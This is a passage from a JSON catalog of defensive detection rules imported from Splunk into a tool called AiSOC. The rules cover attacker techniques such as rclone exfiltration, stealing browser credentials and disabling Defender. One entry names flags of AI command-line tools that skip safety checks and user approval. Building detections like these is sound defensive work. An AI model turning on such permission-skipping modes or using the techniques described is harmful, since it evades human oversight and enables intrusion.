"imported_at": "2026-05-04", "upstream_path": "detections/endpoint/get_foresttrust_with_powershell_script_block.yml" } }, { "id": "splunk-security-content-711d9e8c-2cb0-45cf-8813-5f191ecb9b26", "type": "detection", "name": "O365 Safe Links Detection", "description": "The following analytic detects when any Microsoft Safe Links alerting is triggered. This behavior may indicate when user has interacted with a phishing or otherwise malicious link within the Microsoft Office ecosystem.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-safe-links-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "711d9e8c-2cb0-45cf-8813-5f191ecb9b26", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_safe_links_detection.yml" } }, { "id": "splunk-security-content-7141122c-3bc2-4aaa-ab3b-7a85a0bbefc3", "type": "detection", "name": "GetWmiObject Ds Computer with PowerShell", "description": "The following analytic detects the execution of `powershell.exe` with command-line arguments that utilize the `Get-WmiObject` cmdlet to discover remote systems, specifically targeting the `DS_Computer` parameter.\nThis detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions.\nThis activity is significant as it indicates potential reconnaissance efforts by adversaries to enumerate domain computers and gather situational awareness within Active Directory.\nIf confirmed malicious, this behavior could allow attackers to map the network, identify critical systems, and plan further attacks, potentially leading to unauthorized access and data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1018" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/getwmiobject-ds-computer-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7141122c-3bc2-4aaa-ab3b-7a85a0bbefc3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/getwmiobject_ds_computer_with_powershell.yml" } }, { "id": "splunk-security-content-7173b2ad-6146-418f-85ae-c3479e4515fc", "type": "detection", "name": "Linux Clipboard Data Copy", "description": "The following analytic detects the use of the Linux 'xclip' command to copy data from the clipboard. It leverages Endpoint Detection and Response (EDR) telemetry, focusing on process names and command-line arguments related to clipboard operations. This activity is significant because adversaries can exploit clipboard data to capture sensitive information such as passwords or IP addresses. If confirmed malicious, this technique could lead to unauthorized data exfiltration, compromising sensitive information and potentially aiding further attacks within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1115" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-clipboard-data-copy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7173b2ad-6146-418f-85ae-c3479e4515fc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_clipboard_data_copy.yml" } }, { "id": "splunk-security-content-719f8c78-b20d-4bb9-8c33-6d1a762e7a9a", "type": "detection", "name": "Cisco NVM - Rclone Execution With Network Activity", "description": "This detection identifies execution of the file synchronization utility \"rclone\".\nIt leverages Cisco Network Visibility Module logs, specifically flow data in order to capture process executions\ninitiating network connections.\nWhile rclone is a legitimate command-line tool for syncing data to cloud storage providers, it has been widely abused by threat actors for data exfiltration.\nThis analytic inspects process name and arguments for rclone and flags usage of suspicious flags.\nIf matched, this could indicate malicious usage for stealthy data exfiltration or cloud abuse.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1567.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-nvm-rclone-execution-with-network-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "719f8c78-b20d-4bb9-8c33-6d1a762e7a9a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cisco_nvm___rclone_execution_with_network_activity.yml" } }, { "id": "splunk-security-content-71ad47d1-d6bd-4e0a-b35c-020ad9a6959e", "type": "detection", "name": "Okta Suspicious Use of a Session Cookie", "description": "The following analytic identifies suspicious use of a session cookie by detecting multiple client values (IP, User Agent, etc.) changing for the same Device Token associated with a specific user. It leverages policy evaluation events from successful authentication logs in Okta. This activity is significant as it may indicate an adversary attempting to reuse a stolen web session cookie, potentially bypassing authentication mechanisms. If confirmed malicious, this could allow unauthorized access to user accounts, leading to data breaches or further exploitation within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1539" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/okta-suspicious-use-of-a-session-cookie.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "71ad47d1-d6bd-4e0a-b35c-020ad9a6959e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/okta_suspicious_use_of_a_session_cookie.yml" } }, { "id": "splunk-security-content-71b289db-5f2c-4c43-8256-8bf26ae7324a", "type": "detection", "name": "Windows AD Abnormal Object Access Activity", "description": "The following analytic identifies a statistically significant increase in access to Active Directory objects, which may indicate attacker enumeration. It leverages Windows Security Event Code 4662 to monitor and analyze access patterns, comparing them against historical averages to detect anomalies. This activity is significant for a SOC because abnormal access to AD objects can be an early indicator of reconnaissance efforts by an attacker. If confirmed malicious, this behavior could lead to unauthorized access, privilege escalation, or further compromise of the Active Directory environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-abnormal-object-access-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "71b289db-5f2c-4c43-8256-8bf26ae7324a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_abnormal_object_access_activity.yml" } }, { "id": "splunk-security-content-71bfdb13-f200-4c6c-b2c9-a2e07adf437d", "type": "detection", "name": "WMI Permanent Event Subscription", "description": "The following analytic detects the creation of permanent event subscriptions using Windows Management Instrumentation (WMI). It leverages Sysmon EventID 5 data to identify instances where the event consumers are not the expected \"NTEventLogEventConsumer.\" This activity is significant because it suggests an attacker is attempting to achieve persistence by running malicious scripts or binaries in response to specific system events. If confirmed malicious, this could lead to severe impacts such as data theft, ransomware deployment, or other damaging outcomes. Investigate the associated scripts or binaries to identify the source of the attack.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/wmi-permanent-event-subscription.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "71bfdb13-f200-4c6c-b2c9-a2e07adf437d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/wmi_permanent_event_subscription.yml" } }, { "id": "splunk-security-content-71e1fb89-dd5f-4691-8523-575420de4630", "type": "detection", "name": "AWS Multiple Users Failing To Authenticate From Ip", "description": "The following analytic identifies a single source IP failing to authenticate into the AWS Console with 30 unique valid users within 10 minutes. It leverages CloudTrail logs to detect multiple failed login attempts from the same IP address. This behavior is significant as it may indicate a Password Spraying attack, where an adversary attempts to gain unauthorized access or elevate privileges by trying common passwords across many accounts. If confirmed malicious, this activity could lead to unauthorized access, data breaches, or further exploitation within the AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003", "T1110.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-multiple-users-failing-to-authenticate-from-ip.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "71e1fb89-dd5f-4691-8523-575420de4630", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_multiple_users_failing_to_authenticate_from_ip.yml" } }, { "id": "splunk-security-content-72013a8e-5cea-408a-9d51-5585386b4d69", "type": "detection", "name": "Windows Credential Access From Browser Password Store", "description": "The following analytic identifies a possible non-common browser process accessing its browser user data profile. This tactic/technique has been observed in various Trojan Stealers, such as SnakeKeylogger, which attempt to gather sensitive browser information and credentials as part of their exfiltration strategy. Detecting this anomaly can serve as a valuable pivot for identifying processes that access lists of browser user data profiles unexpectedly. This detection uses a lookup file `browser_app_list` that maintains a list of well known browser applications and the browser paths that are allowed to access the browser user data profiles.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1012" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-credential-access-from-browser-password-store.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "72013a8e-5cea-408a-9d51-5585386b4d69", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_credential_access_from_browser_password_store.yml" } }, { "id": "splunk-security-content-7215831c-8252-4ae3-8d43-db588e82f952", "type": "detection", "name": "Windows Impair Defense Define Win Defender Threat Action", "description": "The following analytic detects modifications to the Windows Defender ThreatSeverityDefaultAction registry setting. It leverages data from the Endpoint.Registry datamodel to identify changes in registry values that define how Windows Defender responds to threats. This activity is significant because altering these settings can impair the system's defense mechanisms, potentially allowing threats to go unaddressed. If confirmed malicious, this could enable attackers to bypass antivirus protections, leading to persistent threats and increased risk of data compromise or further system exploitation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-define-win-defender-threat-action.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7215831c-8252-4ae3-8d43-db588e82f952", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_define_win_defender_threat_action.yml" } }, { "id": "splunk-security-content-72170ec5-f7d2-42f5-aefb-2b8be6aad15f", "type": "detection", "name": "Detect Regasm Spawning a Process", "description": "The following analytic detects regasm.exe spawning a child process. This behavior is identified using data from Endpoint Detection and Response (EDR) agents, focusing on process creation events where regasm.exe is the parent process. This activity is significant because regasm.exe spawning a process is rare and can indicate an attempt to bypass application control mechanisms. If confirmed malicious, this could allow an attacker to execute arbitrary code, potentially leading to privilege escalation or persistent access within the environment. Immediate investigation is recommended to determine the legitimacy of the spawned process and any associated activities.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.009" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-regasm-spawning-a-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "72170ec5-f7d2-42f5-aefb-2b8be6aad15f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_regasm_spawning_a_process.yml" } }, { "id": "splunk-security-content-723716de-ee55-4cd4-9759-c44e7e55ba4b", "type": "detection", "name": "Detect HTML Help Spawn Child Process", "description": "The following analytic detects the execution of hh.exe (HTML Help) spawning a child process, indicating the use of a Compiled HTML Help (CHM) file to execute Windows script code. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events where hh.exe is the parent process. This activity is significant as it may indicate an attempt to execute malicious scripts via CHM files, a known technique for bypassing security controls. If confirmed malicious, this could lead to unauthorized code execution, potentially compromising the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-html-help-spawn-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "723716de-ee55-4cd4-9759-c44e7e55ba4b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/detect_html_help_spawn_child_process.yml" } }, { "id": "splunk-security-content-723b861a-92eb-11eb-93b8-acde48001122", "type": "detection", "name": "AWS IAM Failure Group Deletion", "description": "The following analytic identifies failed attempts to delete AWS IAM groups. It leverages AWS CloudTrail logs to detect events where the DeleteGroup action fails due to errors like NoSuchEntityException, DeleteConflictException, or AccessDenied. This activity is significant as it may indicate unauthorized attempts to modify IAM group configurations, which could be a precursor to privilege escalation or other malicious actions. If confirmed malicious, this could allow an attacker to disrupt IAM policies, potentially leading to unauthorized access or denial of service within the AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-iam-failure-group-deletion.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "723b861a-92eb-11eb-93b8-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_iam_failure_group_deletion.yml" } }, { "id": "splunk-security-content-726959fe-316d-445c-a584-fa187d64e295", "type": "detection", "name": "ASL AWS IAM Assume Role Policy Brute Force", "description": "The following analytic detects multiple failed attempts to assume an AWS IAM role, indicating a potential brute force attack. It leverages AWS CloudTrail logs to identify `MalformedPolicyDocumentException` errors with a status of `failure` and filters out legitimate AWS services. This activity is significant as repeated failures to assume roles can indicate an adversary attempting to guess role names, which is a precursor to unauthorized access. If confirmed malicious, this could lead to unauthorized access to AWS resources, potentially compromising sensitive data and services.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1580", "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-iam-assume-role-policy-brute-force.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "726959fe-316d-445c-a584-fa187d64e295", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_iam_assume_role_policy_brute_force.yml" } }, { "id": "splunk-security-content-72793bc0-c0cd-400e-9e60-fdf36f278917", "type": "detection", "name": "Windows AD GPO Disabled", "description": "This detection identifies when an Active Directory Group Policy is disabled using the Group Policy Management Console.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001", "T1484.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-gpo-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "72793bc0-c0cd-400e-9e60-fdf36f278917", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_gpo_disabled.yml" } }, { "id": "splunk-security-content-729aab57-d26f-4156-b97f-ab8dda8f44b1", "type": "detection", "name": "Linux Deletion Of Init Daemon Script", "description": "The following analytic detects the deletion of init daemon scripts on a Linux machine. It leverages filesystem event logs to identify when files within the /etc/init.d/ directory are deleted. This activity is significant because init daemon scripts control the start and stop of critical services, and their deletion can indicate an attempt to impair security features or evade defenses. If confirmed malicious, this behavior could allow an attacker to disrupt essential services, execute destructive payloads, or persist undetected in the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.004", "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-deletion-of-init-daemon-script.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "729aab57-d26f-4156-b97f-ab8dda8f44b1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_deletion_of_init_daemon_script.yml" } }, { "id": "splunk-security-content-72cb9de9-e98b-4ac9-80b2-5331bba6ea97", "type": "detection", "name": "Circle CI Disable Security Step", "description": "The following analytic detects the disablement of security steps in a CircleCI pipeline. It leverages CircleCI logs, using field renaming, joining, and statistical analysis to identify instances where mandatory security steps are not executed. This activity is significant because disabling security steps can introduce vulnerabilities, unauthorized changes, or malicious code into the pipeline. If confirmed malicious, this could lead to potential attacks, data breaches, or compromised infrastructure. Investigate by reviewing job names, commit details, and user information associated with the disablement, and examine any relevant artifacts and concurrent processes.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1554" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/circle-ci-disable-security-step.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "72cb9de9-e98b-4ac9-80b2-5331bba6ea97", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/circle_ci_disable_security_step.yml" } }, { "id": "splunk-security-content-7349a9e9-3cf6-4171-bb0c-75607a8dcd1a", "type": "detection", "name": "Windows Regsvr32 Renamed Binary", "description": "The following analytic identifies instances where the regsvr32.exe binary has been renamed and executed. This detection leverages Endpoint Detection and Response (EDR) data, specifically focusing on the original filename metadata. Renaming regsvr32.exe is significant as it can be an evasion technique used by attackers to bypass security controls. If confirmed malicious, this activity could allow an attacker to execute arbitrary DLLs, potentially leading to code execution, privilege escalation, or persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.010" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-regsvr32-renamed-binary.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "7349a9e9-3cf6-4171-bb0c-75607a8dcd1a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_regsvr32_renamed_binary.yml" } }, { "id": "splunk-security-content-737e1eb0-065a-11ec-921a-acde48001122", "type": "detection", "name": "Get ADUserResultantPasswordPolicy with Powershell Script Block", "description": "The following analytic detects the execution of the `Get-ADUserResultantPasswordPolicy` PowerShell cmdlet, which is used to obtain the password policy in a Windows domain. It leverages PowerShell Script Block Logging (EventCode=4104) to identify this activity. Monitoring this behavior is significant as it may indicate an attempt to enumerate domain policies, a common tactic used by adversaries for situational awareness and Active Directory discovery. If confirmed malicious, this activity could allow attackers to understand password policies, aiding in further attacks such as password guessing or policy exploitation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1201" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/get-aduserresultantpasswordpolicy-with-powershell-script-block.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "737e1eb0-065a-11ec-921a-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/get_aduserresultantpasswordpolicy_with_powershell_script_block.yml" } }, { "id": "splunk-security-content-737e8baa-d44e-4fa9-8281-24056ed424c0", "type": "detection", "name": "Linux Auditd AI CLI Permission Override Activated", "description": "This detection identifies when an AI command-line tool is launched in an unsafe mode that bypasses normal safety checks and user approvals.\nFor instance, running claude --dangerously-skip-permissions skips all safety restrictions, allowing the tool to operate freely, while gemini --yolo automatically approves all actions without prompting the user.\nThese modes, often called permission overrides or YOLO mode, let the AI execute commands, modify files, or perform tasks without confirmation.\nDetecting their use is important to prevent unintended or potentially harmful operations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1480" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-ai-cli-permission-override-activated.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "737e8baa-d44e-4fa9-8281-24056ed424c0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_ai_cli_permission_override_activated.yml" } }, { "id": "splunk-security-content-73922ff8-3022-11ec-bf5e-acde48001122", "type": "detection", "name": "Disable Defender Submit Samples Consent Feature", "description": "The following analytic detects the modification of the Windows registry to disable the Windows Defender Submit Samples Consent feature. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to the registry path associated with Windows Defender SpyNet and the SubmitSamplesConsent value set to 0x00000000. This activity is significant as it indicates an attempt to bypass or evade detection by preventing Windows Defender from submitting samples for further analysis. If confirmed malicious, this could allow an attacker to execute malicious code without being detected by Windows Defender, leading to potential system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disable-defender-submit-samples-consent-feature.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "73922ff8-3022-11ec-bf5e-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disable_defender_submit_samples_consent_feature.yml" } }, { "id": "splunk-security-content-739ed682-27e9-4ba0-80e5-a91b97698213", "type": "detection", "name": "ASL AWS ECR Container Upload Outside Business Hours", "description": "The following analytic detects the upload of new containers to AWS Elastic Container Service (ECR) outside of standard business hours through AWS CloudTrail events. It identifies this behavior by monitoring for `PutImage` events occurring before 8 AM or after 8 PM, as well as any uploads on weekends. This activity is significant for a SOC to investigate as it may indicate unauthorized access or malicious deployments, potentially leading to compromised services or data breaches. Identifying and addressing such uploads promptly can mitigate the risk of security incidents and their associated impacts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-ecr-container-upload-outside-business-hours.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "739ed682-27e9-4ba0-80e5-a91b97698213", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_ecr_container_upload_outside_business_hours.yml" } }, { "id": "splunk-security-content-73a56508-1cf5-4df7-b8d9-5737fbdc27d2", "type": "detection", "name": "Linux Account Manipulation Of SSH Config and Keys", "description": "The following analytic detects the deletion of SSH keys on a Linux machine. It leverages filesystem event logs to identify when files within \"/etc/ssh/*\" or \"~/.ssh/*\" are deleted. This activity is significant because attackers may delete or modify SSH keys to evade security measures or as part of a destructive payload, similar to the AcidRain malware. If confirmed malicious, this behavior could lead to impaired security features, hindered forensic investigations, or further unauthorized access, necessitating immediate investigation to identify the responsible process and user.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.004", "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-account-manipulation-of-ssh-config-and-keys.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "73a56508-1cf5-4df7-b8d9-5737fbdc27d2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_account_manipulation_of_ssh_config_and_keys.yml" } }, { "id": "splunk-security-content-73cf5dcb-cf36-4167-8bbe-384fe5384d05", "type": "detection", "name": "Windows Remote Access Software BRC4 Loaded Dll", "description": "The following analytic identifies the loading of four specific Windows DLLs (credui.dll, dbghelp.dll, samcli.dll, winhttp.dll) by a non-standard process. This detection leverages Sysmon EventCode 7 to monitor DLL load events and flags when all four DLLs are loaded within a short time frame. This activity is significant as it may indicate the presence of Brute Ratel C4, a sophisticated remote access tool used for credential dumping and other malicious activities. If confirmed malicious, this behavior could lead to unauthorized access, credential theft, and further compromise of the affected system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219", "T1003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-remote-access-software-brc4-loaded-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "73cf5dcb-cf36-4167-8bbe-384fe5384d05", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_remote_access_software_brc4_loaded_dll.yml" } }, { "id": "splunk-security-content-743a322c-9a68-4a0f-9c17-85d9cce2a27c", "type": "detection", "name": "Create or delete windows shares using net exe", "description": "The following analytic detects the creation or deletion of Windows shares using the net.exe command. It leverages Endpoint Detection and Response (EDR) data to identify processes involving net.exe with actions related to share management. This activity is significant because it may indicate an attacker attempting to manipulate network shares 